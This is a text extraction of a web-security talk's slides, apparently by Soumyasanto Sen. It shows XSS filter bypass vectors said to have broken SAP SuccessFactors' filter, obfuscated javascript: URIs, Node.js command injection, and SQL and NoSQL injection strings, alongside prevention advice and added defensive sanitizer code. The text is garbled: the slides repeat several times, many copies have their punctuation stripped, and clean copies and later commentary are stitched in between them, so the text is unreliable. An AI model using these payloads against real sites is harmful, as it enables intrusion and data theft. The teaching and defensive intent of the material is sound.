sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
Hacking looks 'Simple'
Even for...
Breaking SuccessFactors' XSS Filter
'-confirm(1)-' was enough to break the XSS filter of SAP SuccessFactors and made hundreds of web applications built on it vulnerable.
https://jobs.sap.com/talentcommunity/login?returnurl=xxxxxxxxyyyyy<img
Possibilities
• <script><script>alert(1)</script>
• '-confirm(1)-'
https://jobs.sap.com/talentcommunity/login?returnurl=<script><script>alert(1)</script>
Next Vector: <img src=x onerror=alert(1)>
Next Vector: <img src=x onerror=confirm(1)>
Next Vector: <a href=javascript:confirm(1)>click</a>
Next Vectors:
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via URL, e.g. an img's src and/or an anchor's href attribute: implementation of `urlContextCleaner()`
External HTML Sanitizer
https://developers.google.com/caja
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
// urlX: URL policy callback; only http(s) URLs survive, javascript: URLs are dropped
function urlX(url) { if (/^https?:\/\//.test(url)) { return url; } }
// idX: id/name policy callback; passes identifiers through unchanged
function idX(id) { return id; }
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX));
</script>
Hacking in Node.js
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine.
Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs
<s <onmouseover=alert(1)> <s onmouseover=alert(1)>This is a test</s>
<a href=javascript:J a V a S c R iPt:alert(1) <s>>test</a>
(with any encoding)
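The event-handler vectors that got past the SuccessFactors filter (onerror, ontoggle, onsearch) and the obfuscated javascript: URIs above share one fix: decide per context, with an allowlist, after normalising the value the way a browser will. The following is an added example and not the talk's `urlContextCleaner()` nor any Caja code: `urlContextCleaner` accepts a URL attribute value only if its scheme is on an allowlist once entities, case and embedded control characters have been neutralised, and `cleanAttributes` applies it to the attributes of one parsed tag while dropping every `on*` handler. The function names, the scheme allowlist and the test vectors are this example's own assumptions; it expects attribute values from an HTML parser, not raw markup.

```javascript
// Added example (not code from the talk). Context-based filtering for URL
// attributes and event handlers. Input is assumed to be attribute values
// taken from an HTML *parser*, never raw markup matched with regexes.

// Only these schemes may reach href/src/action/formaction; everything else,
// including javascript:, data: and vbscript:, is dropped.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);
const URL_ATTRIBUTES = new Set(["href", "src", "action", "formaction"]);

// Code point guard: String.fromCodePoint throws above U+10FFFF.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");
const NAMED = { tab: "\t", newline: "\n", colon: ":" };

// Decode the entity forms most often used to hide a scheme from a filter:
// &#106; / &#x6A; and the named entities that can split or stand in for ':'.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&(tab|newline|colon);/gi, (_, n) => NAMED[n.toLowerCase()]);
}

// Returns the value to emit, or null when the URL must be removed.
function urlContextCleaner(value) {
  if (typeof value !== "string") return null;
  // Browsers ignore leading/trailing C0 controls and spaces.
  const trimmed = value.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  // The scheme decision is made on a normalised probe: entities decoded,
  // every control/whitespace byte removed (so "java\tscript:" and
  // "J a V a S c R iPt:" both collapse to "javascript:"), lower-cased.
  const probe = decodeEntities(trimmed)
    .replace(/[\x00-\x20\x7f]/g, "")
    .toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(probe);
  if (!m) return trimmed; // no scheme: relative URL, allowed
  return ALLOWED_SCHEMES.has(m[1]) ? trimmed : null;
}

// Attribute-level policy for one parsed tag: drop every on* handler,
// clean URL attributes, keep the rest untouched.
function cleanAttributes(attrs) {
  const out = {};
  for (const [rawName, value] of Object.entries(attrs)) {
    const name = rawName.toLowerCase();
    if (name.startsWith("on")) continue; // onerror, ontoggle, onsearch, ...
    if (URL_ATTRIBUTES.has(name)) {
      const cleaned = urlContextCleaner(value);
      if (cleaned !== null) out[name] = cleaned;
      continue;
    }
    out[name] = value;
  }
  return out;
}

// Constructed vectors, shaped like the ones shown on the slides.
const VECTORS = [
  "javascript:confirm(1)",
  "J a V a S c R iPt:alert(1)",
  "java\tscript:alert(1)",
  "&#106;avascript:alert(1)",
  "javascript&colon;alert(1)",
  "https://example.com/ok",
];
for (const v of VECTORS) {
  console.log(JSON.stringify(v), "->", urlContextCleaner(v));
}
console.log(cleanAttributes({ src: "x", onerror: "confirm(1)" }));
```

The allowlist is what makes the obfuscation irrelevant: the cleaner never tries to recognise "javascript", it only asks whether the scheme is one it knows. Note what this does not cover: it is not an HTML sanitizer on its own (tag structure, `style` attributes and nested-tag parsing bugs like the `<s <onmouseover=...>` case are the parser's job), and the value it returns still has to be attribute-encoded when serialised back into HTML.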
Hacking in Node.js
Server Side JavaScript Injection
A simple JS command injected into an eval() sink:
response.end("Ended Response")
Command injection: child_process.exec() runs the command line through /bin/sh, so the user input becomes part of a shell command, as strace shows:
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l <user input>"], ...)
Hacking in Node.js
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1-- ' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(user = Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}) (NoSQL)
username: {"$gt": ""}
password: {"$gt": ""}
Secure Node.js
Protection
XSS Prevention
• Sanitize untrusted HTML
http://jsxss.com/en/index.html
https://github.com/theSmaw/Caja-HTML-Sanitizer
https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Replace eval() with JSON.parse(): the parsed body is data and can no longer be executed as code
• Use child_process.execFile or child_process.spawn instead of child_process.exec, so arguments reach the program directly instead of through /bin/sh
SQL and NoSQL Injection Prevention
• Use parameterized SQL
var q = 'SELECT name FROM books WHERE id = $1';
client.query(q, [3], function (err, result) { /* ... */ });
• Prepared statements prevent SQL injection
PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
stmt.setString(1, user);
stmt.execute();
• Use the $in operator to match values (NoSQL)
db.users.find({user: {$in: [user]}, pass: {$in: [pass]}})
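An added example (not from the talk) for the NoSQL half of this slide: the login query runs against a constructed in-memory user list with a tiny re-implementation of MongoDB's equality, `$gt` and `$in` matching, so the `{"$gt": ""}` bypass and the two defences (type-checking the input, then the `$in` wrapping shown above) can be watched without a database. The collection, the function names and the matcher are this example's own; it assumes the request body arrives already parsed into an object, as a JSON body or the qs-based extended urlencoded parser would deliver `username[$gt]=&password[$gt]=`.

```javascript
// Added example (not code from the talk): NoSQL operator injection against a
// login query, with a minimal stand-in for MongoDB's matcher so it runs offline.

// Constructed sample collection.
const users = [
  { username: "alice", password: "hunter2" },
  { username: "admin", password: "s3cret!" },
];

// Subset of MongoDB query semantics: equality, $gt, $in. A condition object
// is interpreted as an operator, which is exactly what the attacker abuses.
function matches(doc, query) {
  return Object.entries(query).every(([field, cond]) => {
    const value = doc[field];
    if (cond !== null && typeof cond === "object" && !Array.isArray(cond)) {
      if ("$gt" in cond) return value > cond.$gt;
      if ("$in" in cond) return cond.$in.includes(value);
      throw new Error("unsupported operator in " + JSON.stringify(cond));
    }
    return value === cond;
  });
}

function find(query) {
  return users.filter((doc) => matches(doc, query));
}

// Vulnerable: body fields flow straight into the query. With
// body = { username: { $gt: "" }, password: { $gt: "" } } every user matches.
function loginUnsafe(body) {
  return find({ username: body.username, password: body.password });
}

// Hardened: refuse anything that is not a plain string, so no operator
// object can ever reach the query, then match with $in as the slide shows.
function loginSafe(body) {
  for (const field of ["username", "password"]) {
    if (typeof body[field] !== "string") {
      throw new TypeError(field + " must be a string");
    }
  }
  return find({
    username: { $in: [body.username] },
    password: { $in: [body.password] },
  });
}

// Constructed request bodies: a normal login and the operator injection
// that username[$gt]=&password[$gt]= turns into once parsed.
const GOOD_BODY = { username: "alice", password: "hunter2" };
const ATTACK_BODY = { username: { $gt: "" }, password: { $gt: "" } };

console.log("unsafe, normal  :", loginUnsafe(GOOD_BODY).map((u) => u.username));
console.log("unsafe, injected:", loginUnsafe(ATTACK_BODY).map((u) => u.username));
console.log("safe,   normal  :", loginSafe(GOOD_BODY).map((u) => u.username));
try {
  loginSafe(ATTACK_BODY);
} catch (err) {
  console.log("safe,   injected: rejected with", err.name);
}
```

The type check is the load-bearing part: it keeps attacker-shaped objects out of the query entirely, and it is what makes the `$in` wrapping safe rather than merely harder to abuse. Comparing passwords in the query at all is kept here only because the slide does; a real login would look the user up by name and verify a password hash in application code.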
Positive Side
• Social good: find solutions for social-benefit operations and emergencies
• Penetration testing: find the vulnerabilities that an attacker could exploit
• Open source: much open-source code is produced, tested and improved by hackers, often at hackathons
Good Cause
Negative Side
Top 10 fears of 2015
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Source: Chapman University
Make Difference
Source: Scott Hanselman
Who is the Winner?
A "Hacker" is a state of mind
A "Developer" is a state of function
Choice is Yours
Thank You
Soumyasanto Sen
soumyasanto
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
Good Cause
Positive Side
• Social good: finding solutions for social-benefit operations and emergencies
• Penetration testing: finding vulnerabilities that an attacker could exploit
• Open source: much open-source code is produced, tested and improved by hackers, usually at hackathons
Negative Side: Top 10 fears of 2015
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Source: Chapman University
Make a Difference
Source: Scott Hanselman
Who is the Winner?
A "Hacker" is a state of mind.
A "Developer" is a state of function.
The Choice is Yours.
Thank You
Soumyasanto Sen
@soumyasanto
Easy Filtering
Context Based Filtering
Protection against JavaScript execution via the `url` context, e.g. an img's src and/or an anchor's href attribute: implementation of `urlContextCleaner()`.
Easy Filtering
External HTML Sanitizer
https://developers.google.com/caja
The Caja project includes an html-sanitizer.
Example:
    <script src="html-sanitizer-minified.js"></script>
    <script>
    function urlX(url) { if (/^https?:\/\//.test(url)) { return url } }
    function idX(id) { return id }
    alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"></script>', urlX, idX))
    </script>
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine.
Hacking in Node.js
Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs
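Context-based filtering for the two contexts these payloads target, as an added example (not code from the slides and not Caja's sanitizer): `escapeHtml()` is output encoding for text placed in HTML body or attribute context, so a nested-tag payload renders as text instead of being parsed as markup; `urlContextCleaner()` is a scheme allowlist for href/src values, the job the Context Based Filtering slide assigns to that name. It decodes HTML character references first, because the HTML parser does that before the browser ever sees the URL, and then lets Node's WHATWG URL parser decide the scheme the way the browser would (tabs and newlines stripped, scheme lowercased). Only `urlContextCleaner` is a name from the slides; the rest are this example's own.

```javascript
// Added example: HTML-context encoding and a URL-context scheme allowlist.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };

// HTML body/attribute context: encode the five significant characters so the
// nested-tag payload becomes inert text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Character references are decoded by the HTML parser before URL parsing, so a
// URL check must decode them too or &#106;avascript: slips past a scheme test.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    const v = NAMED_ENTITIES[body.toLowerCase()];
    return v === undefined ? whole : v;
  });
}

// URL context (href/src): decode, parse as the browser would, allow only listed
// schemes. Relative URLs resolve against a placeholder base and so inherit
// https:. Returns the cleaned value, or null when the URL must be dropped.
function urlContextCleaner(value) {
  const decoded = decodeEntities(String(value));
  let parsed;
  try {
    parsed = new URL(decoded, 'https://base.invalid/');
  } catch (e) {
    return null; // unparseable: drop rather than guess
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? decoded.trim() : null;
}
```

The allowlist is deliberately short; a blocklist of `javascript:` spellings is what "incomplete filtering" means in practice, since case changes, embedded tabs or newlines and numeric character references each produce a new spelling the browser still accepts.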